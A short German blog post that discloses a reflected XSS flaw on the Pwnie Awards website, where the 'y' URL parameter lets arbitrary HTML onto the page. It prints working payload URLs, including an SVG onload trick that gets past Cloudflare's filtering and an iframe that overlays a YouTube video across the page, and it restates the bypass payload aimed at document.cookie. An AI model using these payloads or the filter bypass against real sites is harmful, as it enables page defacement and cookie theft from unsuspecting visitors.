XSS auf der Webseite der Pwnie Awards.

Die Pwnie Awards (Öffnet in neuem Fenster) sind quasi die Oscars der Security-Szene.

The Pwnie Awards recognize both excellence and incompetence in the field of information security. Winners are selected by a committee of security industry professionals from nominations collected from the information security community. The awards are presented yearly at the Black Hat Security Conference.

Ein Arbeitskollege hat mich darauf aufmerksam gemacht, dass mit dem Parameter y= in der URL beliebiges HTML auf die Webseite geschleust werden kann.

Üblicherweise können dadurch Angreifer über manipulierte Links die eingeloggten Accounts von Nutzern der Pwnie-Webseite klauen. Doch so einfach ist es nicht. Versucht man darüber die Browser-Cookies zu klauen, hat man zwei Probleme: Davor ist eine Sicherheitsfunktion des CDN-Anbieters Cloudflare geschaltete, die verschiedene Angriffe abfängt und - es gibt werden gar keine Cookies genutzt.

Damit ist die Lücke nicht kritisch, aber immer noch lustig, damit lässt sich nämlich der Inhalt der Webseite ändern, wenn ein manipulierter Link geöffnet wird.

Bei diesem Beispiel wird Cloudflare umgangen und die Domain angezeigt:

https://pwnies.com/category/winners/?y=%3Csvg%20onload=alert%26%230000000040document.domain)%3E

Bei diesem lustigen Beispiel wird YouTube über die ganze Webseite gelegt:

https://pwnies.com/category/winners/?y=%3Ciframe%20src=https://www.youtube.com/embed/dQw4w9WgXcQ%20style=position:fixed;top:0px;left:0px;width:100%;height:100%;border:0;z-index:99999

Die Demo funktioniert in Chrome und Firefox. Safari weigert sich leider.

Das scheint zu bedeuten, dass ein aktueller Cloudflare Bypass (Umgehen der Sicherheitsfunktion) immer noch funktioniert:

<svg onload=alert%26%230000000040document.cookie)>